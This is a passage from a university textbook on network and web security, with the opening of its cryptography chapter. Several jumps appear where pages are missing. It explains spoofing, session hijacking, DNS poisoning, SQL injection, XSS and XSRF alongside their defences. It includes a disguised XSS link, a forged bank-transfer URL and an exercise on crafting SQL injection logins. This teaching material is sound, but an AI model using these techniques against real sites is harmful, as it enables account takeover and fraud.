trying to achieve; i.e. what is the attacker model that belongs to the threat.
Different attackers will have different capabilities. For example, an attacker
connected to the same hub will see all the messages being sent. An attacker
on the same, trusted, local area network (LAN) will be able to perform attacks
without having to worry about an Internet firewall protecting the LAN. Attacks
by different attackers will also have different goals. An attack may be aiming
to gain a capability, for example to get messages onto the LAN. Obviously such
an attack is only relevant for an attacker that does not yet have the capability;
only an outside attacker would need an attack for getting messages onto the
LAN as an inside attacker already has this capability.
To secure the network we need to consider attacks at different layers (see
for example Figure 8.1). Consider the network layer model for TCP/IP (see
Figure 8). An application process will use the transport layer’s connection ser-
vice to manage a connection with a remote process it wants to communicate
with. But to do this (human understandable) addresses used by the application,
such as www.tue.nl, need to be translated to IP addresses understood by the
network layer using DNS. An attacker may try to get the traffic redirected to
their IP address by disturbing this step (e.g. through DNS spoofing). Alterna-
tively, the attacker could influence lower layers to achieve the same result. For
example, an attacker could eavesdrop messages if she has access to the physical
layer.
interface. Some wireless routers (access points) use MAC address ‘whitelisting’
as a security mechanism, allowing only access by the listed MAC addresses.
However, a network device can claim to have any MAC address as modern op-
erating systems allow MAC address changes in software. Some wireless routers
even support setting the MAC address that they use as some Internet modems
only talk to one fixed MAC address. Installing a new router would thus not be
possible without spoofing the MAC.1
the modem; some ISPs disallowed the use of multiple devices on the same connection in the
early days of broadband internet though mainly to prevent commercial use or sharing the
connection with other households. Consumers having multiple PCs, let alone other devices
with internet connection, was not very common back then. Technically this could thus be
classified hacking (‘computervredebreuk’ in Dutch) - for this type of considerations see the
electives course Legal and Technical Aspects of Security (2IC70).
140 CHAPTER 8. NETWORK AND WEB SECURITY
role of crashed server by claiming its IP. Other uses may be to redirect a new
machine on the network to a sign-up page before giving it access e.g. to (the
gateway and) the Internet.
Tools which monitor the network can be used to look for fake responses
(e.g. responses without requests, multiple responses to a request), poisoned ARP
caches (e.g. different values for the same IP), etc. To limit possible damage one
could also use static entries for key addresses (such as the gateway, important
local services) and not use ARP for these addresses. A disadvantage here is the
maintenance involved; if any of the static addresses change, all devices on the
network have to be updated. Also, recall that any device can claim to have any
MAC address so using the correct MAC address does not guarantee that the
message goes to the correct machine.
Instead of trying to prevent the ARP spoofing we can try to solve this at
the higher network layers, taking into account the fact that the lower layer may
be unreliable in the design of protocols for the higher layers.
IP Like the MAC address, the IP address is just a plain text string inside
the message. Spoofing an IP address in a message is simple; just change the
IP header of the message. (See Figure 8.1: put the IP address you want and
compute the corresponding header checksum.) The message will then appear to
come from (or be intended for if you change the destination) that IP address.
To help mitigate attacks based on IP spoofing one can use firewalls to block
message from outside the network that claim to come from an IP on the local
network. Also, it may be possible to trace back the source of the message
(the routers forwarding the message may allow) which may help finding the
source of the attack, or at least defend against it closer to its source (which may
be important e.g. in denial of service attacks). Note that the attacker model
has changes compared to the discussion on e.g. MAC. With MAC spoofing we
consider an attacker on the local network. IP spoofing is basically possible
for any attacker. The firewall defense clearly only makes sense when we are
dealing with an outside attacker. (As we have seen above an attacker on the
local network can likely mount a more powerful attack, actually claiming the IP
rather than only doing IP spoofing.)
IPsec is a set of protocols for authentication and encryption of IP packets.
It supports mutual authentication of the agents involved. Transport mode: to
protect confidentiality, the content of a packet is encrypted. The header is not
modified (not to influence the routing practices on the network). The integrity
of the packet payload and parts of the packet header can also be protected.
Tunnel mode: the entire packet, including header, is encrypted and then the
result is sent as the payload of a new IP packet.
8.1. NETWORK LAYERS AND CORRESPONDING THREATS 141
IPsec was developed as part of the IPv6 standard (though it can also be
employed in IPv4), but not all implementations of IPv6 include IPsec. Security
associations are basically keys used to communicate, along with algorithms,
protocols and settings used. IPsec uses Internet Key Exchange (IKE) to set up
security associations. It uses the Diffie–Hellman (DH) key exchange to set up
a shared session key (or to be more precise a shared secret from which keys are
derived). It can also use certificates to authenticate parties.
When you initially setup an IPsec connection, you have some confidence that
you will securely communicate with the party that you setup the connection
with; the confidentiality and integrity of the communication content can be
protected. However, an authentication phase is still needed in which you ensure
that the party you setup the connection with is actually a party you want to
communicate. This introduces issues of policies, managing secrets (e.g. keys),
etc. which we will see returning in following lectures.
TCP The TCP protocol uses sequence numbers to identify blocks of communi-
cation and these sequence numbers form a basic form of authentication; packets
are only accepted by the receiver if the right sequence number is used.
If we can predict (see e.g. [5]) the (initial) sequence number that the server
will use, we can use a spoofed IP and guessed sequence number to start our own
session with the server; we don’t see the responses but we can issue requests
which will be accepted as coming from the (trusted) client. We do need to
prevent the real client from reacting to messages as seeing an unexpected session
number from the server will cause it to send a reset request which would break
our connection. Note that this attack is more a fake session initiation than a
session hijacking attack but is typically seen as belonging to the category of
session hijacking attacks.
Clearly if we can somehow get the communication with the server we can
simply read the messages and the sequence numbers within them. (We could
for example pretend to be a gateway between the server and the client networks
with the techniques described above or we could also try to get responses from
the server to be sent back by using source routing; in which the sender of the
packet can indicate (part of) the route that the return packet should follow.
However, source routing is nowadays usually disabled.)
A session between a client and server may start with authentication of the
client. In this case we may want to actively take over an (authenticated) session
rather than try to start our own new one. If we can see the traffic to/from the
server we can wait for a connection to be created and authentication to complete,
eavesdrop the session numbers used and then inject our own messages with IP
spoofing using the eavesdropped session numbers. Variants of this attack differ
in how they deal with the client and server responses. For example we can
take down the client after the session has started to prevent it from interfering
with our stolen session. We could also desynchronize the client and server by
resetting the connection on one end but not the other; we now act as a man
in the middle forwarding the responses of the client and the server (adapting
the session numbers) when we want and changing the messages as we please. If
the session includes setting up encryption keys then this type of a man in the
middle attack can also break protection at higher network levels that rely on
this encryption.
142 CHAPTER 8. NETWORK AND WEB SECURITY
A problem with some variations of the attack can be so called ‘ACK storms’
which can give away the attack. The server acknowledges the data that we
send to it but will of course send its acknowledgment packets to the client. If
we don’t prevent these from reaching the client it will, upon receiving these
packets, notice that the acknowledgment number is incorrect and send an ACK
packet back with the correct sequence number in an attempt to re-establish a
synchronized state. However, this response itself will be seen as invalid by the
server, leading to another ACK packet, creating a loop that continues until one
of the ACK packets is lost in transit.
DNS: Domain (URL) to IP DNS (amongst other its other services) trans-
lates human readable addresses (domains), such as www.tue.nl to IP addresses.
A client (e.g. a web browser) typically keeps a local cache (in the brower itself
or in the OS running the browser) of the Domain-IP mapping. However, for
new domains it will need to contact a name server. A local name server is typi-
cally set along with the IP address of the machine (manually or as an optional
part of DHCP). To look up the address, this local name server will recursively
make other calls if they are needed to find the address as we discussed earlier
in Chapter 3. The local name server has a cache of its own.
The example in Figure 8.5 shows a possible flow of events. If (1) the client
tries to look up www.tue.nl and (2) this domain is not in the cache the name
server will (3) ask the root name server. A 16-bit ID is included in the query and
an answer is linked to the query by checking its ID which should be the same.
The root name server does not have (4) the IP for domain www.tue.nl itself but
does know which name server is responsible for the top level domain .nl; lets
say this is for example ns.sidn.org for the .nl domain. Thus the root name
server refers the requester to this server (5). This reference is typically given
by ‘name’. Here the name server already knows (6) where to find ns.sidn.org
from its cache (otherwise it would first have to do another DNS lookup). Thus it
contacts (7), the server which again will do a redirection (8), now to ns.tue.nl.
Here the name server for the domain is actually within the tue.nl domain.
While ns.tue.nl is responsible for (known as the ‘authoritive name server’) the
domain tue.nl, including ns.tue.nl, if we do not know the IP for ns.tue.nl
we can of course not ask it for its own IP. To solve this the .nl name server
stores the IP address of ns.tue.nl (a so called glue record) and also sends this
with its response in (9). This response is stored in the cache (10). Finally we
get the IP we are looking for (11,12) which is stored in the cache and returned
to the client (not depicted).
There are several types of attacks possible on the DNS scheme. Figure 8.6
8.1. NETWORK LAYERS AND CORRESPONDING THREATS 143
illustrates, using the same setting as the example in Figure 8.5, two attacks in
which the attacker is a client who is trying to ‘poison’ (i.e. insert a fake record
into) the cache of a name server (Target NS). In the first attack the attacker
sends a lot of requests for the address it wants to poison. If the address is not
yet in the cache, the name server will send out requests for this address. The
attacker in the meantime sends many fake replies to this request containing a
fake (attacker controlled) IP and using different values for the ID. If one of the
IDs used by the attacker matches one of the IDs used in the request of the name
server the response will be accepted and the attacker’s IP address will be linked
to the website (www.tue.nl) in the cache of the name server. Other users of the
same name server will now be directed to the attacker when they try to visit
(www.tue.nl).
In a variation of the attack above, the attacker asks for a non-existent domain.
The advantage is that the domain will for sure not be in the cache of the local
name server and no name server will resolve the domain so the attacker has no
competition for its response queries. But what use is getting the name server to
have a false record for a non-existent domain? The clue is the use of glue records;
if the attacker can get the name server to accept her response she can include a
glue record which will also be stored and can make an important domain name
(e.g. that of a name server ns.tue.nl) point at her IP.
Not only the name server but also the client itself may be targeted. For
example (see Figure 8.7) an evil web site could include many items from the
www.tue.nl domain. If the client visits the page this will cause many requests
for www.tue.nl and the attacker can send many responses at the same time,
hoping to match the ID of one of the requests.
DNSSEC One possible defense against the DNS attacks described above is
to authenticate responses using digital signatures.
(Side Note) Digital signatures are important. The signer encrypts his message
or a hash computed from this message with his private key (only known to the
signer) to create a signature that is communicated together with the original
message. The result is a packet that contains the original message plus the
signature, called a ‘signed’ message. The receiver can use the public key of the
signer (known to everyone) to decrypt the signature and compare the outcome
with the hash computed again at the receiver. This is shown in Figure 8.8. (End
of Side Note)
Figure 8.8: Digital signature usage: Note that Bob’s private key should not be
reproducable from his public key. (Figure by Kurose and Ross)
part_one/
146 CHAPTER 8. NETWORK AND WEB SECURITY
becomes more important; we have already seen some examples such as the ‘ping
of death’ where an oversized payload causes an error in the application handling
the ping messages. While other layers simply treat the payload as a binary
blob to be transported, at the application layer the content gets processed and
interpreted. As the content may come from untrusted parties this opens up the
risk of attacks through content that is interpreted incorrectly. Thus here we
will look at the content of the communication, for example for security of web
services we need to carefully consider user input to those services.
Web services need to collect information from the user to do their job; the
news article to display, the address to dispatch an order to, etc. Information
collected, through setting parameters in the links or explicitly entered in forms,
can be manipulated by an attacker. Sometimes changing the user-id in the
address bar is already enough to get at the content of another user. Forms
used to gather user input may contain checks (e.g. is an email address format
correct, does the text entered in the telephone field contain only numbers, etc.).
However, on the server end one should not rely on such checks as an attacker
can simply change the data after the check or send its own (unchecked) data
without using the form at all.
When doing a blind injection; where the structure of the database and/or
the queries constructed by the web application are not known, some effort is first
required to find this structure. Some web applications, when getting an error
from the database, simply display the error to the user. This may be useful to
the application developer for debugging purposes but will also provide a lot of
valuable information to the attacker. For example, the query used, tables that
exist/do not exist, etc. Sometimes the application filters the error only showing
that some error occurred. Even only being able to see whether an error occurs,
or even only how long it takes before the web application responds gives a way
to extract information about/from the database.
What can be done to prevent SQL injections? The web application can
employ several countermeasures. The main one is input filtering. A basic step
could be to check the size of the input; e.g. if the input is a pincode it should
only be a few characters long. This would already make it more difficult to
construct successful SQL exploits. A stronger defense would be to ensure that
the user input is not interpreted as being part of the query by checking the
input from the user for special characters (e.g. ’) or sequences. The database
API may actually have a filtering function that achieves this which should then
be used so the web developer does not have to write to code for it (with a risk
of errors and/or oversights); for example using mysql_real_escape_string($_-
POST[’naam’]); instead of just $_POST[’naam’]; in Figure 8.11. Of course this
needs to be done for all user inputs in all scripts. This is a main reason why
these vulnerabilities still exist; even if the script developer is aware (not all are),
it is easy to forget it just once which may be enough to completely expose the
database.
When supported by the database, a way to safely get the input to the
database is to use parameterized queries. Instead of building a query string
which includes the user’s input, the query contains parameters and the user
input is passed to the database as values to be used for the queries. In this
way no confusion is possible between what is part of the query and what is user
input. Thus the user input cannot change the query/inject code into it.
In addition to the input one could validate the output of the query. Similar
to input size checking we can check whether the output matches our expectation;
if we are expecting a single record and get back a whole list something is likely
wrong and the results should not be used.
XSS Cross Site Scripting (XSS) is another example where user input forms
a danger to web applications and their users. In an XSS attack an attacker
gets a user(’s browser) to run code that seems to come from another (trusted)
website. User (attacker) input to the website is used to to inject code (a script)
into a ‘trusted’ page. Coming from a trusted page, a victim’s machine will
8.2. APPLICATION LAYER SECURITY 149
allow execution of the code, which can then e.g. control communication with
the trusted site (become a ‘man in the middle’), steal information only meant
for the trusted site (private/confidential information, credentials, sessions keys,
etc.) or exploit local vulnerabilities to gain even more access to the victim’s
machine.
Consider a subscription to a new website ‘news.example.com’ (see Figure 8.11)
where users can place comments with an article which are then shown to all
users reading the article. An attacker Mallory could post a comment contain-
ing a script which would then be accepted by user Bob’s browser as part of
the ‘news.example.com’ website and thus has all the rights any script from
news.example.com would have. For example, it can read the cookies that
news.example.com has set when Bob logged in and send them to Mallory. With
those cookies Mallory can impersonate Bob at news.example.com.
A comment section is an obvious user input and news.example.com may, as
with SQL injections employ input filtering, disallowing scripts (see also coun-
termeasures below). However, there are also other, less obvious, user inputs
that can be employed to launch an XSS attack as in Figure 8.12. To indicate
the selected article, news.example.com uses the ‘item’ parameter, which should
be set to the id number of some item. If a non-existent id number is used the
website will report that the given number does not exist.
The error message is a way for a user (e.g. Mallory) to inject code; by
setting item to some code instead of an article id that code will be injected into
a news.example.com page showing the error message. The script can be used to
hide the error message part so the page looks like a normal page. Now Mallory
can run code that seems to come from news.example.com but it runs on her
own machine under her account. To get the code to run on Bob’s machine she
needs to get Bob to follow the link she has constructed.
If Bob is well educated in security and is thus suspicious of ‘untrusted’ links.
Mallory will need to hide the fact that the link contains a script. She could dis-
play a link different from the actual link and combine this with tricks like: news.
example.com/archive?dummy="This-very-long-argument-....-hides-the
-rest-from-view"&item=<script>...</script> which
abuses that fact that Bob’s browser will likely only show the first part of a very
long link. She could also try to encode it; %3C%73%63%72%69%70%74%3E is the
same as <script> but may not be recognized as such both by Bob as well as
by a naive input filter.
Other than educating the user not to follow untrusted links, even if they
seem to go to ‘trusted’ sites, there is little that can be done on the user site.
When visiting a page with a stored XSS or after Bob follows the malformed
link, Bob’s system is confronted with code that comes from the ‘right’ (trusted)
server. Distinguishing it from code that is legitimate is very challenging. (See
also Section 8.3 below.)
On the server side, as with SQL, input filtering is an important countermea-
sure. User input with special meaning should be translated into a ‘safe’ format.
When coding a web application one should thus be very careful with user input.
Note that filtering requires being able to distinguish between valid input and
harmful content. This may be difficult, for example for a webmail application
where the input is an email written in html. Removing dangerous parts but still
allowing the user to give all the types of input can thus be very difficult. Web
scripting languages typically provide some functions, e.g. the ‘htmlspecialchars’
150 CHAPTER 8. NETWORK AND WEB SECURITY
function that replaces characters by their html encoding. This, however, is not
sufficient to make the user input ‘safe’ in the example. Additionally XSS input
filtering, as with SQL filtering, needs to be done on all relevant user inputs in
all scripts.
Tool support to analyse scripts for vulnerabilities such as SQL injection and
XSS is thus desirable. There are tools which try to detect XSS vulnerabilities.
Such tools aim to ensure functions such as ‘htmlspecialchars’ are applied in a
sufficient way to make the input safe. As automatically checking user input
usage against what is dangerous in a given setting is not easy such tools often
miss vulnerabilities and/or create many false positives making them less conve-
nient to use. Similarly there are tools for SQL injection analysis as well as more
general code analysis tools to search for (security) bugs.
XSRF Cross-Site request forgery (XSRF) is another attack where user in-
put (in this case requests) is misused. While an XSS attack tricks a user(’s
browser) into trusting and running code, an XSRF attack aims to send autho-
rized but unintended requests to a (trusted) website. Consider a user visiting
evil.site.com while still logged in to bank.example.com. (See Figure 8.13.) On
the evil site there is a link to an ‘image’, located at url http://bank.example.
com/transfer.php?from=Bob&to=Mallory&amount=1000. The user’s browser
will follow this link to load the image. However, the link is not really an image
but a request to bank.example.com to transfer money. As Bob is already logged
in at bank.example.com the request will succeed.
A variation of the XSRF attack above, also shown in Figure 8.13, has the
same setting of Bob visiting evil.site.com while logged in, but this time at stor-
agebox.example.com where Bob stores his important files. Again a fake link will
be followed by Bob’s browser resulting at a request to storagebox.example.com
to login as Mallory. Bob’s session is thus replaced and he is now logged on as
Mallory. Of course Mallory does not store her important files here. Instead
she hopes that Bob will not notice the change before uploading an important
document. The document will go to Mallory’s account so she can also access it.
In this section we’ve seen several types of attacks against web servers and
their users. A general defense against these types of attacks is to (try to) de-
crease the value of what can be stolen; e.g. accepting authentication cookies
only from the right IP would make abuse of stolen cookies harder. We will look
at network defenses in general in Section 8.3. As a general conclusion for this
section we can state: data is more dangerous than you think. Not only unknown
programs or devices but also any data from an untrusted source can be a source
of attacks.
8.2. APPLICATION LAYER SECURITY 151
8.2.1 Malware
Above we have looked at some specific vulnerabilities of networks and the ma-
chines on a network. Different types of malware exploit such weaknesses to
infiltrate the system, replicate, spread and achieve some malicious goal.
Trojans are legitimate looking programs (or other content) that actually
carry malicious code inside. Viruses can replicate, usually involving some action
like running an infected program (like biological viruses need a host organism,
computer viruses infect programs). Worms are able to replicate by themselves,
without the need of human action. Well known worms, such as conficker, spread
around networks (e.g. the Internet) exploiting vulnerabilities of network services
and machines. Adware is a type of software that automatically shows advertise-
ments or redirect your searches to advertising websites, in order to generate
revenues for its creator. (This is not necessarily malicious, however many types
of adware try to hide on your system, avoid uninstall and/or gather information
without your consent.) Classification of malware into these categories, however,
is sometimes difficult and terms are commonly mixed, using e.g. virus for any
type of malware.
While some hacks, viruses and worms may have been ‘just to see what I can
do’, i.e. idealistic, to demonstrate the vulnerability or simple vandalism, modern
malware is for the most part targeting big businesses or are even used for digital
warfare. The conficker worm, for instance, installs scareware (showing pop-ups
to get user to buy a fake anti-virus solution) and creates a botnet; a network
of machines under control of the attacker, which can then be used for sending
spam, distributed DoS attacks, renting out to others, etc. The worm has an
update mechanism used to download its software for its malicious activities as
well as updates to its spreading mechanism and protection against updates of
anti-virus software that would be able to protect against it.
(Zero-day) vulnerabilities, exploits, virus building kits and botnets are com-
modities that are traded on the black market. One thus does not even have
to create one’s own malware or botnet; it is possible to buy or rent infected
machines. (See for example Metasploit www.metasploit.com for hacking made
easy.) Botnets are controlled through command and control centers. By using a
C&C center to drive a botnet, the malware can easily be updated and adapted,
making it hard to take down the network of bots. To prevent the C&C cen-
ter itself from being taken down, it is located in countries where there are no
laws to easily do this, its location is hidden e.g. within a list of addresses, using
anonymous services in TOR3 and/or redundancy is used so a new C&C can
easily be created at a different location. As in many security areas there is an
arms race between taking out botnet C&C centers and new infections, botnets
and control methods appearing.
Of course with all the value a botnet represents there are those that will try
to take it over, either to dismantle/study it (e.g. [24]) or to use it for their own
illegitimate agenda. It has also been suggested to take this defense strategy a
step further; use weaknesses in infected machine to force installation of patches,
removing of and protecting against malware but there are many moral, legal,
practical and technical issues with such an approach. Related to this is use
of ‘hacking’ by authorities which is also the subject of debate what actions are
justified, should e.g. ‘hacking’ by the police be allowed (and if so to what degree,
3 www.torproject.org
152 CHAPTER 8. NETWORK AND WEB SECURITY
project security1.win.tue.nl/spyspot/.
8.3. DEFENDING AGAINST NETWORK SECURITY THREATS 153
The AC matrix tries to simply list all allowed (‘good’) cases. As we have seen
this quickly becomes unmanageable, thus prompting the introduction of more
advanced specification methods such as RBAC and XACML. In other settings
there are simply way too many possibilities to create a simple list. We thus
need to express a model for ‘good’ or ‘bad’ in a more efficient way. For example
input filtering against SQL is a form of blacklisting where we use a set of rules,
for example, “the ’ symbol is not allowed in a user input used to construct an
SQL query”. or replace the offending character with a safe encoding.)
Anti virus Anti virus software tries to identify malware and prevent it from
causing harm. Typically by periodically scanning the whole system, checking
content as it comes in (e.g. downloads in the browser, incoming email) and on
access scan; programs get scanned on the fly as they are started. It recognizes
malware in different ways; signature based recognition compares the scanned
content against a list of known viruses. This requires constant updating of the
list of ‘fingerprints’ of known viruses. Viruses not on the list yet will be missed.
Also variations of the same virus may be missed if the characteristic fingerprint
is changed or masked.
The number of viruses is huge and growing quickly. Though virus software
uses several mechanisms to reduce the performance cost, such as checking for
changes (storing e.g. a CRC of a scanned program) and not rechecking un-
changed programs, purely signature based detection becomes unfeasible.
Heuristic recognition tries to recognize malware for example by running the
program in isolation (i.e. a ‘sandbox’) to examine its behaviour or decompiling
to look whether the code contains characteristic malware patterns. It is not
possible in general to decide whether content is ‘malicious’ thus we can only
approximate while making mistakes and mislabeling some content.
There are all clearly signature/rule based blacklisting approaches; they try to
track and recognize the ‘bad’ cases. There is some problem with false positives;
some legitimate programs will match a signature or heuristic rule. The false
negative problem, however, is much bigger; previously unknown malware cannot
be detected. This is a general issue for techniques using signature or rule based
models; they cannot deal with new cases which were not considered when the
signatures/rules were made.
There are also whitelisting approaches that try to combat malware. For
example, Windows will normally only install device drivers that are digitally
signed. This is thus a rule based whitelist; “accept only those drivers that
are signed by the correct authority”. The authority is trusted to check that
the code is not malicious. Reputation based systems look at how long has the
program been around, how often is it used, where and in which context, based
on feedback from millions of machines (note the potential privacy risk). Here
the community at large instead of a single authority is used as a source of trust
in the program.
154 CHAPTER 8. NETWORK AND WEB SECURITY
IDS Malware will often use the network to spread or otherwise execute ma-
licious activities (for example botnet activities such as sending loads of spam
mail). Intrusion detection systems (IDS) monitor the network to find (and possi-
bly block) malicious activities. IDS systems come in two main classes; signature
and anomaly based. As mentioned, signature based systems check for patterns
in the traffic that match known attacks. Anomaly based systems look for ‘ab-
normal’ behavior; anything that is not the usual behavior on the network could
indicate an attack. These classes thus have the same drawbacks as observed for
virus scanners.
Not all attacks can be detected and not all detected anomalies (or signature
matches) are attacks. A way to measure the quality of an IDS is to look at
its false negative rate (missed malicious traffic) versus its false positive (false
alarm) rate. Perfect detection rate with no false negatives and no positives is
impossible. Instead we are left with a trade-off between detection rate and the
amount of (false) alarms that are raised and need to dealt with by the security
officer.
Signature based systems have a high false negative rate on new attacks while
anomaly based systems will suffer from false positives.
In signature based systems the trade-off is set by how ‘wide’ the rules are
(with ‘everything is an attack’ as an extreme). With anomaly based systems it
is set by choosing a threshold on how uncommon an activity has to be to be
called an anomaly (such as ‘traffic to addresses that occurred less than t percent
of the cases during the training is anomalous’.)
of the network. Firewalls do exactly this by filtering the traffic between two
networks, e.g. an organization’s LAN and the Internet, an organization’s web
services and its intranet, a single PC and the intranet, etc.
Filtering can happen at different layers of abstraction (and thus at different
network layers). For example a basic packet filtering firewall (working at the
network layer) can help against IP spoofing of local addresses by outside attack-
ers and can block access to ports (and services) that should not be accessible.
If working at the TCP level, it will likely need to remember which sessions are
open to be able to distinguish real responses from spoofed messages; a state-
ful firewall. Increased filter complexity can have a significant impact on the
resources needed and thus the performance of the firewall. Going up to the
application layer one can try to block dangerous data or known threats; such
as remove active components from web pages, macros from word documents,
block downloaded files containing viruses, tag spam and phishing emails, etc.
Of course this greatly increases the complexity of the firewall; instead of looking
at single packets one needs to understand the protocol being used, extract and
reconstruct the data being sent, interpret and evaluate the data to determine
whether it is harmful.
A main difference between firewalls and intrusion detection systems is that
the former actually blocks traffic considered to be malicious. With an IDS the
operator still needs to respond to deal with the attack (for example by defining
a new firewall rule.) The use of firewalls thus has a direct impact on availability
and usability; if we block traffic then availability and usability will go down.
For example, by blocking port 22 of all machines except the public SSH server
you help protect the network (e.g. a mis-configured machine vulnerable on port
22 would not be accessible from the outside) but also disallow other computers
on the network from offering SSH connections. Also, the firewall will impact
network performance with more advanced filtering requiring more effort thus
adding to cost and/or leading to further loss of performance.
A good policy (a model of ‘good’ and/or ‘bad’ traffic) is thus needed to
make firewalls useful; one that implements optimal trade-offs between protect-
ing against network risks and keeping network services available. The risks,
ways to detect attacks and network services needed change dynamically, mak-
ing maintaining an effective firewall challenging.
The use of anomaly based approaches is uncommon when actually blocking
traffic; not only is there the risk of a high false positive rate but also the reason
why a particular message did not arrive might become unclear. Knowing a set of
rules for the firewall a user can understand why certain connections do not work
and what to change in the rules to make them work. However, understanding a
machine-learned model of traffic used for anomaly detection, let alone updating
it, is a lot more difficult.
Note that the firewall can only inspect the traffic that it can see. If data is
encrypted (a best practice for securing a connection) this limits the possibilities
for the firewall.
Summarizing, a firewall is a very useful tool and is employed by nearly anyone
operating a network. They are even built into operating systems to protect
the (network consisting of only the) PC from the network it is connected to.
Still, given its inherent limitations it is by itself not sufficient to protect a local
network. Thus it is typically combined with IDS to find threats on the local
network and anti-virus on the end-points; the machines on the network.
156 CHAPTER 8. NETWORK AND WEB SECURITY
8.4 Summary
In this chapter we have looked at Network security and Web service security.
We first looked at threats at the different network layers and specifically ap-
plication layer threats for web servers. Firewalls to try to keep attacker from
entering the local network, intrusion detection systems to find an attacker that
managed to enter the local network and anti-virus solutions to protect against
attacks that manage to reach the end-points. We identify black/white listing
and signature/anomaly based models as methods used by these approaches to
classify traffic/content into normal and malicious.
8.4.1 Literature
Suggested reading
• Sections 8.6-8.10 of the book Computer Networking: A Top-Down Ap-
proach [20, Sec. 8.6-8.10],
• Hunting the Unknown, White-Box Database Leakage Detection [12].
4. Once again consider the online music store scenario of Exercise 6 in Chap-
ter 1. Enhance the requirements you extracted and security design that
you made by considering threats and techniques introduces in this chap-
ter. Indicate how you would apply the techniques, what trade-offs this
imposes and what effect they have on both the attacks as well as on the
goals of the legitimate actors in the system, and, if applicable what new
goals/actors you need to introduce.
5. Figure 8.1 shows several example attacks and their place in the OSI stack.
No example is given of an attack related to the translation between trans-
port and network layer. Give a threat that you would consider to fit in
this location.
6. Assume the script in Figure 8.11 is used on a website. What input could
an attacker give (in the username and password fields) to:
(a) login as user Alice.
(b) test a guess (e.g. MyPassword) for Alice’s password.
(c) test whether Alice’s password starts with M.
7. Consider the DNS poisoning attack against a local name server.
(a) What is the attacker model; which implicit assumptions are made
and why?
(b) The attacker needs to get the guessed ID to match one of the IDs
of one of the outgoing requests. Each ID is a (uniformly) randomly
chosen 16-bit number. Suppose the attacker sends the same number
of fake answers as there are requests. How many requests do there
need to be for the attacker to have at least a 50% chance of succeed-
ing? (Hint consider the change that none of the fake answers match
any of the requests.)
8. The quality of an anomaly based IDS (or more generally the performance
of any binary classifier) can be shown with a so called “Receiver operating
characteristic (ROC) curve” which plots the false positive rate (false alerts)
against the true positive (detection) rate (true alerts; equal to 1 - false
negative rate). (Recall that setting a different threshold results in different
trade-off between these two numbers.)
(a) Draw a ROC curve with four classifiers; the first does random guess-
ing, the second achieves a detection rate of 80% at the cost of a 40%
false positive the third a detection rate of 90% at the cost of 30%
false positive rate and finally a perfect classifier.
(b) Assume we have a classifier that is below the line of the random
guessing. How could we make a better classifier out of this?
Chapter 9
Cryptography
Cryptography is one of the main building blocks available to the network security
engineer. In this chapter we describe the basics of cryptography, the design and
building of ciphers, and cryptanalysis, as well as the analysis and breaking of
ciphers. Together these are referred to as cryptology.
This chapter first discusses the security goals that one may want to achieve
with cryptography and then treats the two main classes of cryptography: Sym-
metric and Public Key (also known as Asymmetric) Cryptography.
In our discussion we try to answer the following questions:
• How to defend against different attacker models using crypto?
• How to encrypt and decrypt large messages?
– As encryption algorithms typically have a size limit on the messages
that they encrypt we discuss how to encode larger messages split into
multiple blocks.
• What does it mean to say “a cipher is secure”?
158
9.1. BASICS AND SECURITY GOALS OF CRYPTOGRAPHY 159
piece of input information (the key) secret should be sufficient. Note that this
is an instance of the more general ‘not relying on security through obscurity’
principle.
Figure 9.1 shows the basic operation of a cryptography system; an encryp-
tion system protects a message by creating a jumbled version of the message
using a known method (the encryption algorithm) and a small piece of secret
information (the encryption key). With a corresponding secret (the decryption
key) and another known method (the decryption algorithm) the secret message
can be recovered. Trying to use the decryption method without knowing the
correct key provides no information about the secret message.
Encrypting data thus aims to protect its confidentiality. There are also
cryptographic techniques such as digital signatures (see also Section 9.3), which
allow checking integrity. Authenticity and providing non-repudiation can also
be achieved using encryption schemes.
Several privacy enhancing techniques use techniques similar to asymmet-
ric cryptography and indirectly, through confidentiality, cryptography can con-
tribute to privacy. However, privacy is typically not a direct goal of cryptog-
raphy; your data is under control of other entities which have control over the
data. Privacy requirements restrict what they may do with the data, not the
ability to get to the data.
Encryption clearly has a negative impact on availability. Decryption aims
to maintain availability in the presence of encryption, of course, only for those
with the correct decryption keys. Thus confidentiality and availability can be
160 CHAPTER 9. CRYPTOGRAPHY
combined by ensuring only the correct parties that have the relevant decryption
keys (recall the discussion on security requirements from the first chapter).
retically secure) if encryption with a random key gives a cipher text that is not
correlated with the plaintext.
Formally, consider random variable k (the randomly selected key). We re-
quire that for any cipher text c and potential plaintexts p1 , p2 :
P(c = Enc k (p1 )) = P(c = Enc k (p2 ))
where P denotes the probability. That is, if one does not know the key each
plaintext is equally likely to have been the one that was encrypted.
An alternative, equivalent, definition is that for any probabilistic distribution
over plaintexts (the attacker’s a-priori estimate of how likely a given plaintext
is) the attacker learns nothing new by obtaining the cipher text; the conditional
probability of plaintexts given an encryption with a random key is the same as
in the original distribution over plaintext.
Recall from Chapter 1 that a notion of ‘secure’ should consider both the goal
to be reached (a security policy in terms of security attributes to be achieved)
and under which conditions/situations this goal must be achieved (the attacker
model). We can summarize these as follows: the term ‘unconditionally secure’
cipher refers to the security goal ‘confidentiality of the plaintext’ with security
policy ‘those who do not know the randomly generated key may not learn any-
thing about the plaintext’ and the attacker is one with unlimited computational
resources, knows (Kerckhoff’s principle) the cipher including the probability dis-
tribution of the keys (because the attacker knows the key generation algorithm)
but does not know the actual key (outcomes of the random choices in the key
generation algorithm are not known).
Unconditional security imposes a very strong requirement on the cipher. Is it
actually possible to create a cipher which achieves this? This is indeed possible
(assuming the number of possible plaintexts is finite) and can be achieved by a
surprisingly simple system; the one-time pad.
plaintext bits p1 p2 p3 p4 p5 …
key bits k1 k2 k3 k4 k5 …
cipher text bits p1 ⊕ k1 p2 ⊕ k2 p3 ⊕ k3 p4 ⊕ k4 p5 ⊕ k5 …
Similarly if we use the one time pad for securely storing (rather than sending)
some data we would need to securely store a key of equal length. Here the only
remaining benefit is that an attacker would have to obtain both the key and
encrypted data, which we could try to make difficult e.g. by storing them in
different places. This is a form of so called secret sharing.
So the one time pad is secure2 but needs impractically long keys. Could we
not think of a more efficient system which achieves the same level of security?
Unfortunately, such a system cannot exist (see Exercise 9). Thus people have
been trying to create practical encryption systems which are ‘good enough’.
Below we look at some of these attempts.
Substitution Ciphers The Caesar cipher which, as its name suggests, was
already used in Roman times, is a simple substitution cipher. Given a plaintext
we simply shift each letter by a fixed number of places (e.g. A becomes D, B
becomes E etc.) to obtain the cipher text. To decrypt we shift back by the
same number of places.
plaintext letters H E L L O …
key letter (repeats) C C C C C …
